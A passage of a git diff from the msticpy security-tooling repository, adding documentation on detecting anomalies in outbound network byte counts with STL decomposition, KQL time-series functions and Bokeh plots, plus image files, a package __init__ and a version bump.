+          <td>2291183</td>
+          <td>789268398</td>
+          <td>90628087</td>
+          <td>1</td>
+          <td>879896485</td>
+          <td>0.029661</td>
+          <td>0</td>
+        </tr>
+        <tr>
+          <th>2</th>
+          <td>2019-05-01T08:00:00Z</td>
+          <td>852506841</td>
+          <td>-2875384</td>
+          <td>791851068</td>
+          <td>63531157</td>
+          <td>1</td>
+          <td>855382225</td>
+          <td>-0.038923</td>
+          <td>0</td>
+        </tr>
+        <tr>
+          <th>3</th>
+          <td>2019-05-01T09:00:00Z</td>
+          <td>898793650</td>
+          <td>17934415</td>
+          <td>794432848</td>
+          <td>86426386</td>
+          <td>1</td>
+          <td>880859234</td>
+          <td>0.237320</td>
+          <td>0</td>
+        </tr>
+        <tr>
+          <th>4</th>
+          <td>2019-05-01T10:00:00Z</td>
+          <td>891598085</td>
+          <td>8677706</td>
+          <td>797012590</td>
+          <td>85907788</td>
+          <td>1</td>
+          <td>882920378</td>
+          <td>0.114440</td>
+          <td>0</td>
+        </tr>
+      </tbody>
+    </table>
+    </div>
+
+|
+
+Displaying Anomalies using STL
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+We will filter only the anomalies (with value 1 from anomalies column) of
+the output dataframe retrieved after running the msticpy function
+`timeseries_anomalies_stl`
+
+.. code:: ipython3
+
+    output[output['anomalies']==1]
+
+.. raw:: html
+
+    <div>
+    <style scoped>
+        .dataframe tbody tr th:only-of-type {
+            vertical-align: middle;
+        }
+
+        .dataframe tbody tr th {
+            vertical-align: top;
+        }
+
+        .dataframe thead th {
+            text-align: right;
+        }
+    </style>
+    <table border="1" class="dataframe">
+      <thead>
+        <tr style="text-align: right;">
+          <th></th>
+          <th>TimeGenerated</th>
+          <th>TotalBytesSent</th>
+          <th>residual</th>
+          <th>trend</th>
+          <th>seasonal</th>
+          <th>weights</th>
+          <th>baseline</th>
+          <th>score</th>
+          <th>anomalies</th>
+        </tr>
+      </thead>
+      <tbody>
+        <tr>
+          <th>299</th>
+          <td>2019-05-13T17:00:00Z</td>
+          <td>916767394</td>
+          <td>288355070</td>
+          <td>523626111</td>
+          <td>104786212</td>
+          <td>1</td>
+          <td>628412323</td>
+          <td>3.827062</td>
+          <td>1</td>
+        </tr>
+        <tr>
+          <th>399</th>
+          <td>2019-05-17T21:00:00Z</td>
+          <td>1555286702</td>
+          <td>296390627</td>
+          <td>1132354860</td>
+          <td>126541214</td>
+          <td>1</td>
+          <td>1258896074</td>
+          <td>3.933731</td>
+          <td>1</td>
+        </tr>
+        <tr>
+          <th>599</th>
+          <td>2019-05-26T05:00:00Z</td>
+          <td>1768911488</td>
+          <td>347810809</td>
+          <td>1300005332</td>
+          <td>121095345</td>
+          <td>1</td>
+          <td>1421100678</td>
+          <td>4.616317</td>
+          <td>1</td>
+        </tr>
+      </tbody>
+    </table>
+    </div>
+
+|
+
+Read From External Sources
+^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+If you have time series data in other locations, you can read it via
+pandas or respective data store API where data is stored. The pandas I/O
+API is a set of top level reader functions accessed like
+pandas.read_csv() that generally return a pandas object.
+
+Read More at Pandas Documentation: - `I/O Tools (Text
+,CSV,HDF5..) <https://pandas.pydata.org/pandas-docs/stable/user_guide/io.html>`__
+
+Example of using Pandas ``read_csv`` to read local csv file containing
+TimeSeries demo dataset. Additional columns in the csv such as
+``baseline``, ``score`` and ``anoamlies`` are generated using built-in
+KQL Time series functions such as ``series_decompose_anomalies()``.
+
+.. code:: ipython3
+
+    timeseriesdemo = pd.read_csv('TimeSeriesDemo.csv',
+                              parse_dates=["TimeGenerated"],
+                              infer_datetime_format=True)
+    timeseriesdemo.head()
+
+
+
+
+.. raw:: html
+
+    <div>
+    <style scoped>
+        .dataframe tbody tr th:only-of-type {
+            vertical-align: middle;
+        }
+
+        .dataframe tbody tr th {
+            vertical-align: top;
+        }
+
+        .dataframe thead th {
+            text-align: right;
+        }
+    </style>
+    <table border="1" class="dataframe">
+      <thead>
+        <tr style="text-align: right;">
+          <th></th>
+          <th>TimeGenerated</th>
+          <th>TotalBytesSent</th>
+          <th>baseline</th>
+          <th>score</th>
+          <th>anomalies</th>
+        </tr>
+      </thead>
+      <tbody>
+        <tr>
+          <th>0</th>
+          <td>2019-05-01 06:00:00</td>
+          <td>873713587</td>
+          <td>782728212</td>
+          <td>0.224776</td>
+          <td>0</td>
+        </tr>
+        <tr>
+          <th>1</th>
+          <td>2019-05-01 07:00:00</td>
+          <td>882187669</td>
+          <td>838492449</td>
+          <td>0.000000</td>
+          <td>0</td>
+        </tr>
+        <tr>
+          <th>2</th>
+          <td>2019-05-01 08:00:00</td>
+          <td>852506841</td>
+          <td>816772273</td>
+          <td>0.000000</td>
+          <td>0</td>
+        </tr>
+        <tr>
+          <th>3</th>
+          <td>2019-05-01 09:00:00</td>
+          <td>898793650</td>
+          <td>878871426</td>
+          <td>0.000000</td>
+          <td>0</td>
+        </tr>
+        <tr>
+          <th>4</th>
+          <td>2019-05-01 10:00:00</td>
+          <td>891598085</td>
+          <td>862639955</td>
+          <td>0.000000</td>
+          <td>0</td>
+        </tr>
+      </tbody>
+    </table>
+    </div>
+
+|
+
+Displaying Time Series anomaly alerts
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+You can also use ``series_decompose_anomalies()`` which will run Anomaly
+Detection based on series decomposition. This takes an expression
+containing a series (dynamic numerical array) as input and extract
+anomalous points with scores.
+
+**KQL Reference Documentation:** -
+`series_decompose_anomalies <https://docs.microsoft.com/azure/kusto/query/series-decompose-anomaliesfunction>`__
+
+You can use available query
+``qry_prov.MultiDataSource.get_timeseries_alerts()`` to get the similar
+details
+
+::
+
+   Query:  get_timeseries_alerts
+   Data source:  LogAnalytics
+   Time Series anomaly alerts generated using built-in KQL time series functions
+
+   Parameters
+   ----------
+   aggregatecolumn: str (optional)
+       field to agregate from source dataset
+       (default value is: Total)
+   aggregatefunction: str (optional)
+       Aggregation functions to use - count(), sum(), avg() etc
+       (default value is: count())
+   end: datetime
+       Query end time
+   groupbycolumn: str (optional)
+       Group by field to aggregate results
+       (default value is: Type)
+   scorethreshold: str (optional)
+       Score threshold for alerting
+       (default value is: 3)
+   start: datetime
+       Query start time
+   table: str
+       Table name
+   timeframe: str (optional)
+       Aggregation TimeFrame
+       (default value is: 1h)
+   timestampcolumn: str (optional)
+       Timestamp field to use from source dataset
+       (default value is: TimeGenerated)
+   where_clause: str (optional)
+       Optional additional filter clauses
+   Query:
+    {table} {where_clause} | project {timestampcolumn},{aggregatecolumn},{groupbycolumn}
+    | where {timestampcolumn} >= datetime({start})
+    | where {timestampcolumn} <= datetime({end})
+    | make-series {aggregatecolumn}={aggregatefunction} on {timestampcolumn} from datetime({start}) to datetime({end})
+      step {timeframe} by {groupbycolumn}
+    | extend (anomalies, score, baseline) = series_decompose_anomalies({aggregatecolumn}, {scorethreshold},-1,"linefit")
+    | mv-expand {aggregatecolumn} to typeof(double), {timestampcolumn} to typeof(datetime),
+      anomalies to typeof(double), score to typeof(double), baseline to typeof(long)
+    | where anomalies > 0
+    | extend score = round(score,2)
+
+.. code:: ipython3
+
+    time_series_alerts= qry_prov.MultiDataSource.get_timeseries_alerts(start=start, end =end, table='CommonSecurityLog',timestampcolumn = 'TimeGenerated', aggregatecolumn='SentBytes',groupbycolumn='DeviceVendor',aggregatefunction='sum(SentBytes)', scorethreshold='1.5', where_clause='|where DeviceVendor=="Palo Alto Networks"')
+    time_series_alerts
+
+
+
+
+
+
+.. raw:: html
+
+    <div>
+    <style scoped>
+        .dataframe tbody tr th:only-of-type {
+            vertical-align: middle;
+        }
+
+        .dataframe tbody tr th {
+            vertical-align: top;
+        }
+
+        .dataframe thead th {
+            text-align: right;
+        }
+    </style>
+    <table border="1" class="dataframe">
+      <thead>
+        <tr style="text-align: right;">
+          <th></th>
+          <th>DeviceVendor</th>
+          <th>SentBytes</th>
+          <th>TimeGenerated</th>
+          <th>anomalies</th>
+          <th>score</th>
+          <th>baseline</th>
+        </tr>
+      </thead>
+      <tbody>
+        <tr>
+          <th>0</th>
+          <td>Palo Alto Networks</td>
+          <td>2.318680e+09</td>
+          <td>2020-03-09 23:00:00</td>
+          <td>1.0</td>
+          <td>1.52</td>
+          <td>2204764145</td>
+        </tr>
+      </tbody>
+    </table>
+    </div>
+
+|
+
+Displaying Anomalies Separately
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+We will filter only the anomalies shown in the above plot and display
+below along with associated aggregated hourly time window. You can later
+query for the time windows scope for additional alerts triggered or any
+other suspicious activity from other data sources.
+
+.. code:: ipython3
+
+    timeseriesdemo[timeseriesdemo['anomalies'] == 1]
+
+
+
+
+.. raw:: html
+
+    <div>
+    <style scoped>
+        .dataframe tbody tr th:only-of-type {
+            vertical-align: middle;
+        }
+
+        .dataframe tbody tr th {
+            vertical-align: top;
+        }
+
+        .dataframe thead th {
+            text-align: right;
+        }
+    </style>
+    <table border="1" class="dataframe">
+      <thead>
+        <tr style="text-align: right;">
+          <th></th>
+          <th>TimeGenerated</th>
+          <th>TotalBytesSent</th>
+          <th>baseline</th>
+          <th>score</th>
+          <th>anomalies</th>
+        </tr>
+      </thead>
+      <tbody>
+        <tr>
+          <th>299</th>
+          <td>2019-05-13 17:00:00</td>
+          <td>916767394</td>
+          <td>662107538</td>
+          <td>3.247957</td>
+          <td>1</td>
+        </tr>
+        <tr>
+          <th>399</th>
+          <td>2019-05-17 21:00:00</td>
+          <td>1555286702</td>
+          <td>1212399509</td>
+          <td>4.877577</td>
+          <td>1</td>
+        </tr>
+        <tr>
+          <th>599</th>
+          <td>2019-05-26 05:00:00</td>
+          <td>1768911488</td>
+          <td>1391114419</td>
+          <td>5.522387</td>
+          <td>1</td>
+        </tr>
+      </tbody>
+    </table>
+    </div>
+
+|
+
+Time Series Anomalies Visualization
+-----------------------------------
+
+Time series anomalies once discovered, you can visualize with line chart
+type to display outliers. Below we will see 2 types to visualize using msticpy function
+``display_timeseries_anomalies()`` via Bokeh library as well as using
+built-in KQL ``render``.
+
+Using Bokeh Visualization Library
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+Documentation for display_timeseries_anomalies
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+::
+
+   display_timeseries_anomolies(
+       data: pandas.core.frame.DataFrame,
+       y: str = 'Total',
+       time_column: str = 'TimeGenerated',
+       anomalies_column: str = 'anomalies',
+       source_columns: list = None,
+       period: int = 30,
+       **kwargs,
+   ) -> <function figure at 0x7f0de9ae2598>
+   Docstring:
+    Display time series anomalies visualization.
+
+    Parameters
+    ----------
+    data : pd.DataFrame
+        DataFrame as a time series data set retrieved from KQL time series functions
+        dataframe will have columns as TimeGenerated, y, baseline, score, anomalies
+    y : str, optional
+        Name of column holding numeric values to plot against time series to determine anomalies
+        (the default is 'Total')
+    time_column : str, optional
+        Name of the timestamp column
+        (the default is 'TimeGenerated')
+    anomalies_column : str, optional
+        Name of the column holding binary status(1/0) for anomaly/benign
+        (the default is 'anomalies')
+    source_columns : list, optional
+        List of default source columns to use in tooltips
+        (the default is None)
+    period : int, optional
+        Period of the dataset for hourly-no of days, for daily-no of weeks.
+        This is used to correctly calculate the plot height.
+        (the default is 30)
+
+    Other Parameters
+    ----------------
+    ref_time : datetime, optional
+        Input reference line to display (the default is None)
+    title : str, optional
+        Title to display (the default is None)
+    legend: str, optional
+        Where to position the legend
+        None, left, right or inline (default is None)
+    yaxis : bool, optional
+        Whether to show the yaxis and labels
+    range_tool : bool, optional
+        Show the the range slider tool (default is True)
+    height : int, optional
+        The height of the plot figure
+        (the default is auto-calculated height)
+    width : int, optional
+        The width of the plot figure (the default is 900)
+    xgrid : bool, optional
+        Whether to show the xaxis grid (default is True)
+    ygrid : bool, optional
+        Whether to show the yaxis grid (default is False)
+    color : list, optional
+        List of colors to use in 3 plots as specified in order
+        3 plots- line(observed), circle(baseline), circle_x/user specified(anomalies).
+        (the default is ["navy", "green", "firebrick"])
+
+    Returns
+    -------
+    figure
+        The bokeh plot figure.
+
+.. code:: ipython3
+
+    display_timeseries_anomolies(data=timeseriesdemo, y= 'TotalBytesSent')
+
+
+
+.. raw:: html
+
+
+        <div class="bk-root">
+            <a href="https://bokeh.org" target="_blank" class="bk-logo bk-logo-small bk-logo-notebook"></a>
+            <span id="1001">Loading BokehJS ...</span>
+        </div>
+
+
+
+.. image:: _static/TimeSeriesAnomalieswithRangeTool.png
+
+|
+
+
+
+Exporting Plots as PNGs
+^^^^^^^^^^^^^^^^^^^^^^^
+
+To use bokeh.io image export functions you need selenium, phantomjs and
+pillow installed:
+
+``conda install -c bokeh selenium phantomjs pillow``
+
+or
+
+``pip install selenium pillow`` ``npm install -g phantomjs-prebuilt``
+
+For phantomjs see https://phantomjs.org/download.html.
+
+Once the prerequisites are installed you can create a plot and save the
+return value to a variable. Then export the plot using ``export_png``
+function.
+
+.. code:: ipython3
+
+    from bokeh.io import export_png
+    from IPython.display import Image
+
+    # Create a plot
+    timeseries_anomaly_plot = display_timeseries_anomolies(data=timeseriesdemo, y= 'TotalBytesSent')
+
+    # Export
+    file_name = "plot.png"
+    export_png(timeseries_anomaly_plot, filename=file_name)
+
+    # Read it and show it
+    display(Markdown(f"## Here is our saved plot: {file_name}"))
+    Image(filename=file_name)
+
+
+
+.. raw:: html
+
+
+        <div class="bk-root">
+            <a href="https://bokeh.org" target="_blank" class="bk-logo bk-logo-small bk-logo-notebook"></a>
+            <span id="1407">Loading BokehJS ...</span>
+        </div>
+
+
+
+Here is our saved plot: plot.png
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+
+.. image:: _static/TimeSeriesAnomaliesExport.png
+
+|
+
+Using Built-in KQL render operator
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+Render operator instructs the user agent to render the results of the
+query in a particular way. In this case, we are using timechart which
+will display linegraph.
+
+**KQL Reference Documentation:** -
+`render <https://docs.microsoft.com/azure/kusto/query/renderoperator?pivots=azuremonitor>`__
+
+.. code:: ipython3
+
+    timechartquery = """
+    let TimeSeriesData = PaloAltoTimeSeriesDemo_CL
+    | extend TimeGenerated = todatetime(EventTime_s), TotalBytesSent = todouble(TotalBytesSent_s)
+    | summarize TimeGenerated=make_list(TimeGenerated, 10000),TotalBytesSent=make_list(TotalBytesSent, 10000) by deviceVendor_s
+    | project TimeGenerated, TotalBytesSent;
+    TimeSeriesData
+    | extend (baseline,seasonal,trend,residual) = series_decompose(TotalBytesSent)
+    | mv-expand TotalBytesSent to typeof(double), TimeGenerated to typeof(datetime),
+      baseline to typeof(long), seasonal to typeof(long), trend to typeof(long), residual to typeof(long)
+    | project TimeGenerated, TotalBytesSent, baseline
+    | render timechart with (title="Palo Alto Outbound Data Transfer Time Series decomposition")
+    """
+    %kql -query timechartquery
+
+
+.. image:: _static/TimeSeriesKQLPlotly.PNG
\ No newline at end of file
diff --git a/docs/source/visualization/_static/DataViewer.png b/docs/source/visualization/_static/DataViewer.png
new file mode 100644
index 000000000..5e39e7aeb
Binary files /dev/null and b/docs/source/visualization/_static/DataViewer.png differ
diff --git a/docs/source/visualization/_static/FoliumMap-01.png b/docs/source/visualization/_static/FoliumMap-01.png
new file mode 100644
index 000000000..24b4b6135
Binary files /dev/null and b/docs/source/visualization/_static/FoliumMap-01.png differ
diff --git a/docs/source/visualization/_static/Matrix_plot_basic.png b/docs/source/visualization/_static/Matrix_plot_basic.png
new file mode 100644
index 000000000..1ed12b404
Binary files /dev/null and b/docs/source/visualization/_static/Matrix_plot_basic.png differ
diff --git a/docs/source/visualization/_static/Matrix_plot_sorted.png b/docs/source/visualization/_static/Matrix_plot_sorted.png
new file mode 100644
index 000000000..bf3e6bc72
Binary files /dev/null and b/docs/source/visualization/_static/Matrix_plot_sorted.png differ
diff --git a/docs/source/visualization/_static/Matrix_plot_value_col.png b/docs/source/visualization/_static/Matrix_plot_value_col.png
new file mode 100644
index 000000000..1d39f2ee5
Binary files /dev/null and b/docs/source/visualization/_static/Matrix_plot_value_col.png differ
diff --git a/docs/source/visualization/_static/Matrix_plot_value_distinct.png b/docs/source/visualization/_static/Matrix_plot_value_distinct.png
new file mode 100644
index 000000000..e2a76a146
Binary files /dev/null and b/docs/source/visualization/_static/Matrix_plot_value_distinct.png differ
diff --git a/docs/source/visualization/_static/Matrix_plot_value_intersect.png b/docs/source/visualization/_static/Matrix_plot_value_intersect.png
new file mode 100644
index 000000000..8a6ef3da3
Binary files /dev/null and b/docs/source/visualization/_static/Matrix_plot_value_intersect.png differ
diff --git a/docs/source/visualization/_static/Matrix_plot_value_inv.png b/docs/source/visualization/_static/Matrix_plot_value_inv.png
new file mode 100644
index 000000000..df543c991
Binary files /dev/null and b/docs/source/visualization/_static/Matrix_plot_value_inv.png differ
diff --git a/docs/source/visualization/_static/Matrix_plot_value_log.png b/docs/source/visualization/_static/Matrix_plot_value_log.png
new file mode 100644
index 000000000..e68c3b03e
Binary files /dev/null and b/docs/source/visualization/_static/Matrix_plot_value_log.png differ
diff --git a/docs/source/visualization/_static/TimeLine-01.png b/docs/source/visualization/_static/TimeLine-01.png
new file mode 100644
index 000000000..2fb03804a
Binary files /dev/null and b/docs/source/visualization/_static/TimeLine-01.png differ
diff --git a/docs/source/visualization/_static/TimeSeriesAnomaliesExport.png b/docs/source/visualization/_static/TimeSeriesAnomaliesExport.png
new file mode 100644
index 000000000..e3fa8aef1
Binary files /dev/null and b/docs/source/visualization/_static/TimeSeriesAnomaliesExport.png differ
diff --git a/docs/source/visualization/_static/TimeSeriesAnomalieswithRangeTool.png b/docs/source/visualization/_static/TimeSeriesAnomalieswithRangeTool.png
new file mode 100644
index 000000000..3456768ce
Binary files /dev/null and b/docs/source/visualization/_static/TimeSeriesAnomalieswithRangeTool.png differ
diff --git a/docs/source/visualization/_static/TimeSeriesKQLPlotly.PNG b/docs/source/visualization/_static/TimeSeriesKQLPlotly.PNG
new file mode 100644
index 000000000..8f5568f9c
Binary files /dev/null and b/docs/source/visualization/_static/TimeSeriesKQLPlotly.PNG differ
diff --git a/docs/source/visualization/_static/Timeline-02.png b/docs/source/visualization/_static/Timeline-02.png
new file mode 100644
index 000000000..27baa819f
Binary files /dev/null and b/docs/source/visualization/_static/Timeline-02.png differ
diff --git a/docs/source/visualization/_static/Timeline-03.png b/docs/source/visualization/_static/Timeline-03.png
new file mode 100644
index 000000000..04527aa23
Binary files /dev/null and b/docs/source/visualization/_static/Timeline-03.png differ
diff --git a/docs/source/visualization/_static/Timeline-04.png b/docs/source/visualization/_static/Timeline-04.png
new file mode 100644
index 000000000..dde7d7d00
Binary files /dev/null and b/docs/source/visualization/_static/Timeline-04.png differ
diff --git a/docs/source/visualization/_static/Timeline-05.png b/docs/source/visualization/_static/Timeline-05.png
new file mode 100644
index 000000000..ca2cedaf6
Binary files /dev/null and b/docs/source/visualization/_static/Timeline-05.png differ
diff --git a/docs/source/visualization/_static/Timeline-06.png b/docs/source/visualization/_static/Timeline-06.png
new file mode 100644
index 000000000..53549d301
Binary files /dev/null and b/docs/source/visualization/_static/Timeline-06.png differ
diff --git a/docs/source/visualization/_static/Timeline-07.png b/docs/source/visualization/_static/Timeline-07.png
new file mode 100644
index 000000000..cd759caf1
Binary files /dev/null and b/docs/source/visualization/_static/Timeline-07.png differ
diff --git a/docs/source/visualization/_static/Timeline-08.png b/docs/source/visualization/_static/Timeline-08.png
new file mode 100644
index 000000000..fb471c37a
Binary files /dev/null and b/docs/source/visualization/_static/Timeline-08.png differ
diff --git a/docs/source/visualization/_static/Timeline-09.png b/docs/source/visualization/_static/Timeline-09.png
new file mode 100644
index 000000000..d153b8267
Binary files /dev/null and b/docs/source/visualization/_static/Timeline-09.png differ
diff --git a/docs/source/visualization/_static/Timeline_duration-01.png b/docs/source/visualization/_static/Timeline_duration-01.png
new file mode 100644
index 000000000..4dcb555b4
Binary files /dev/null and b/docs/source/visualization/_static/Timeline_duration-01.png differ
diff --git a/docs/source/visualization/_static/Timeline_duration-02.png b/docs/source/visualization/_static/Timeline_duration-02.png
new file mode 100644
index 000000000..45c9dbb0f
Binary files /dev/null and b/docs/source/visualization/_static/Timeline_duration-02.png differ
diff --git a/docs/source/visualization/_static/Timeline_markers-02.png b/docs/source/visualization/_static/Timeline_markers-02.png
new file mode 100644
index 000000000..1cf632418
Binary files /dev/null and b/docs/source/visualization/_static/Timeline_markers-02.png differ
diff --git a/docs/source/visualization/_static/Widgets-Multiopt1.png b/docs/source/visualization/_static/Widgets-Multiopt1.png
new file mode 100644
index 000000000..8d2da98c1
Binary files /dev/null and b/docs/source/visualization/_static/Widgets-Multiopt1.png differ
diff --git a/docs/source/visualization/_static/Widgets-Multiopt2.png b/docs/source/visualization/_static/Widgets-Multiopt2.png
new file mode 100644
index 000000000..3f87780a5
Binary files /dev/null and b/docs/source/visualization/_static/Widgets-Multiopt2.png differ
diff --git a/docs/source/visualization/_static/Widgets-RegWidget1.png b/docs/source/visualization/_static/Widgets-RegWidget1.png
new file mode 100644
index 000000000..0da234986
Binary files /dev/null and b/docs/source/visualization/_static/Widgets-RegWidget1.png differ
diff --git a/docs/source/visualization/_static/Widgets-RegWidget2.png b/docs/source/visualization/_static/Widgets-RegWidget2.png
new file mode 100644
index 000000000..d505d402e
Binary files /dev/null and b/docs/source/visualization/_static/Widgets-RegWidget2.png differ
diff --git a/docs/source/visualization/_static/Widgets-RegWidget3.png b/docs/source/visualization/_static/Widgets-RegWidget3.png
new file mode 100644
index 000000000..bf257f8c3
Binary files /dev/null and b/docs/source/visualization/_static/Widgets-RegWidget3.png differ
diff --git a/docs/source/visualization/_static/Widgets-RegWidget4.png b/docs/source/visualization/_static/Widgets-RegWidget4.png
new file mode 100644
index 000000000..2bab074f7
Binary files /dev/null and b/docs/source/visualization/_static/Widgets-RegWidget4.png differ
diff --git a/docs/source/visualization/_static/Widgets1.png b/docs/source/visualization/_static/Widgets1.png
new file mode 100644
index 000000000..fd99288ee
Binary files /dev/null and b/docs/source/visualization/_static/Widgets1.png differ
diff --git a/docs/source/visualization/_static/Widgets2.png b/docs/source/visualization/_static/Widgets2.png
new file mode 100644
index 000000000..4da5c702c
Binary files /dev/null and b/docs/source/visualization/_static/Widgets2.png differ
diff --git a/docs/source/visualization/_static/Widgets4.png b/docs/source/visualization/_static/Widgets4.png
new file mode 100644
index 000000000..6a3eeb097
Binary files /dev/null and b/docs/source/visualization/_static/Widgets4.png differ
diff --git a/docs/source/visualization/_static/Widgets5.png b/docs/source/visualization/_static/Widgets5.png
new file mode 100644
index 000000000..9178b96ee
Binary files /dev/null and b/docs/source/visualization/_static/Widgets5.png differ
diff --git a/docs/source/visualization/_static/Widgets6.png b/docs/source/visualization/_static/Widgets6.png
new file mode 100644
index 000000000..d62962741
Binary files /dev/null and b/docs/source/visualization/_static/Widgets6.png differ
diff --git a/docs/source/visualization/_static/Widgets7.png b/docs/source/visualization/_static/Widgets7.png
new file mode 100644
index 000000000..511d794ab
Binary files /dev/null and b/docs/source/visualization/_static/Widgets7.png differ
diff --git a/docs/source/visualization/_static/Widgets8.png b/docs/source/visualization/_static/Widgets8.png
new file mode 100644
index 000000000..9e87ec004
Binary files /dev/null and b/docs/source/visualization/_static/Widgets8.png differ
diff --git a/docs/source/visualization/_static/Widgets9.png b/docs/source/visualization/_static/Widgets9.png
new file mode 100644
index 000000000..42e3890f4
Binary files /dev/null and b/docs/source/visualization/_static/Widgets9.png differ
diff --git a/docs/source/visualization/_static/dataviewer_add_filter.png b/docs/source/visualization/_static/dataviewer_add_filter.png
new file mode 100644
index 000000000..79fdfd740
Binary files /dev/null and b/docs/source/visualization/_static/dataviewer_add_filter.png differ
diff --git a/docs/source/visualization/_static/dataviewer_apply_filter.pdn b/docs/source/visualization/_static/dataviewer_apply_filter.pdn
new file mode 100644
index 000000000..77487f753
Binary files /dev/null and b/docs/source/visualization/_static/dataviewer_apply_filter.pdn differ
diff --git a/docs/source/visualization/_static/dataviewer_apply_filter.png b/docs/source/visualization/_static/dataviewer_apply_filter.png
new file mode 100644
index 000000000..f308b3e4a
Binary files /dev/null and b/docs/source/visualization/_static/dataviewer_apply_filter.png differ
diff --git a/docs/source/visualization/_static/dataviewer_choose_columns.pdn b/docs/source/visualization/_static/dataviewer_choose_columns.pdn
new file mode 100644
index 000000000..41da47488
Binary files /dev/null and b/docs/source/visualization/_static/dataviewer_choose_columns.pdn differ
diff --git a/docs/source/visualization/_static/dataviewer_choose_columns.png b/docs/source/visualization/_static/dataviewer_choose_columns.png
new file mode 100644
index 000000000..e7d22a8cd
Binary files /dev/null and b/docs/source/visualization/_static/dataviewer_choose_columns.png differ
diff --git a/docs/source/visualization/_static/dataviewer_column_sort.pdn b/docs/source/visualization/_static/dataviewer_column_sort.pdn
new file mode 100644
index 000000000..506abf421
Binary files /dev/null and b/docs/source/visualization/_static/dataviewer_column_sort.pdn differ
diff --git a/docs/source/visualization/_static/dataviewer_column_sort.png b/docs/source/visualization/_static/dataviewer_column_sort.png
new file mode 100644
index 000000000..544142bf5
Binary files /dev/null and b/docs/source/visualization/_static/dataviewer_column_sort.png differ
diff --git a/docs/source/visualization/_static/dataviewer_operator.png b/docs/source/visualization/_static/dataviewer_operator.png
new file mode 100644
index 000000000..bc83fc511
Binary files /dev/null and b/docs/source/visualization/_static/dataviewer_operator.png differ
diff --git a/docs/source/visualization/_static/ent_graph_add.png b/docs/source/visualization/_static/ent_graph_add.png
new file mode 100644
index 000000000..f93050460
Binary files /dev/null and b/docs/source/visualization/_static/ent_graph_add.png differ
diff --git a/docs/source/visualization/_static/ent_graph_link.png b/docs/source/visualization/_static/ent_graph_link.png
new file mode 100644
index 000000000..c04f3d3e0
Binary files /dev/null and b/docs/source/visualization/_static/ent_graph_link.png differ
diff --git a/docs/source/visualization/_static/ent_graph_note.png b/docs/source/visualization/_static/ent_graph_note.png
new file mode 100644
index 000000000..e333b8901
Binary files /dev/null and b/docs/source/visualization/_static/ent_graph_note.png differ
diff --git a/docs/source/visualization/_static/ent_graph_remove.png b/docs/source/visualization/_static/ent_graph_remove.png
new file mode 100644
index 000000000..754430942
Binary files /dev/null and b/docs/source/visualization/_static/ent_graph_remove.png differ
diff --git a/docs/source/visualization/_static/entitygraph.png b/docs/source/visualization/_static/entitygraph.png
new file mode 100644
index 000000000..069536c40
Binary files /dev/null and b/docs/source/visualization/_static/entitygraph.png differ
diff --git a/docs/source/visualization/_static/entitygraph_w_timeline.png b/docs/source/visualization/_static/entitygraph_w_timeline.png
new file mode 100644
index 000000000..bd8836e5b
Binary files /dev/null and b/docs/source/visualization/_static/entitygraph_w_timeline.png differ
diff --git a/docs/source/visualization/_static/process_tree1.png b/docs/source/visualization/_static/process_tree1.png
new file mode 100644
index 000000000..25e69ed28
Binary files /dev/null and b/docs/source/visualization/_static/process_tree1.png differ
diff --git a/docs/source/visualization/_static/process_tree2.png b/docs/source/visualization/_static/process_tree2.png
new file mode 100644
index 000000000..742388df5
Binary files /dev/null and b/docs/source/visualization/_static/process_tree2.png differ
diff --git a/docs/source/visualization/_static/process_tree3.png b/docs/source/visualization/_static/process_tree3.png
new file mode 100644
index 000000000..aad75d80a
Binary files /dev/null and b/docs/source/visualization/_static/process_tree3.png differ
diff --git a/docs/source/visualization/_static/process_tree4.png b/docs/source/visualization/_static/process_tree4.png
new file mode 100644
index 000000000..aeea488af
Binary files /dev/null and b/docs/source/visualization/_static/process_tree4.png differ
diff --git a/docs/source/visualization/_static/process_tree_mde.png b/docs/source/visualization/_static/process_tree_mde.png
new file mode 100644
index 000000000..05be1fc62
Binary files /dev/null and b/docs/source/visualization/_static/process_tree_mde.png differ
diff --git a/msticpy/__init__.py b/msticpy/__init__.py
index bf319633b..a9cc9837b 100644
--- a/msticpy/__init__.py
+++ b/msticpy/__init__.py
@@ -1 +1,47 @@
-"""Placeholder for top level folder."""
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""
+msticpy - Jupyter and Python Tools for InfoSec.
+
+-----------------------------------------------
+
+Requires Python 3.6 or later.
+
+To quickly import common modules into a notebook run:
+
+>>> from msticpy import init_notebook
+>>> init_notebook(globals())
+
+For more options:
+>>> help(init_notebook)
+
+-----------------------------------------------
+
+Full documentation is available at:
+    https://msticpy.readthedocs.io
+
+GitHub repo:
+    https://github.com/microsoft/msticpy
+
+"""
+
+import os
+
+# flake8: noqa: F403
+from .nbtools.nbinit import init_notebook, current_providers
+from .common import pkg_config as settings
+from .common.check_version import check_version
+from . import sectools
+from . import nbtools
+from . import data
+from .config.mp_config_edit import MpConfigEdit, MpConfigFile
+from ._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen, Pete Bryan, Ashwin Patil"
+
+if not os.environ.get("KQLMAGIC_EXTRAS_REQUIRES"):
+    os.environ["KQLMAGIC_EXTRAS_REQUIRES"] = "jupyter-basic"
diff --git a/msticpy/_version.py b/msticpy/_version.py
index ab6eb862b..5ec05e3ad 100644
--- a/msticpy/_version.py
+++ b/msticpy/_version.py
@@ -1,2 +1,2 @@
 """Version file."""
-VERSION = "0.1.03"
+VERSION = "1.6.1"
diff --git a/__init__.py b/msticpy/analysis/__init__.py
similarity index 73%
rename from __init__.py
rename to msticpy/analysis/__init__.py
index 9ff54dba8..d2439c236 100644
--- a/__init__.py
+++ b/msticpy/analysis/__init__.py
@@ -3,7 +3,8 @@
 # Licensed under the MIT License. See License.txt in the project root for
 # license information.
 # --------------------------------------------------------------------------
-"""__init__ for mstic.py package."""
+"""MSTIC Analysis Tools."""
 
-# flake8: noqa: F403
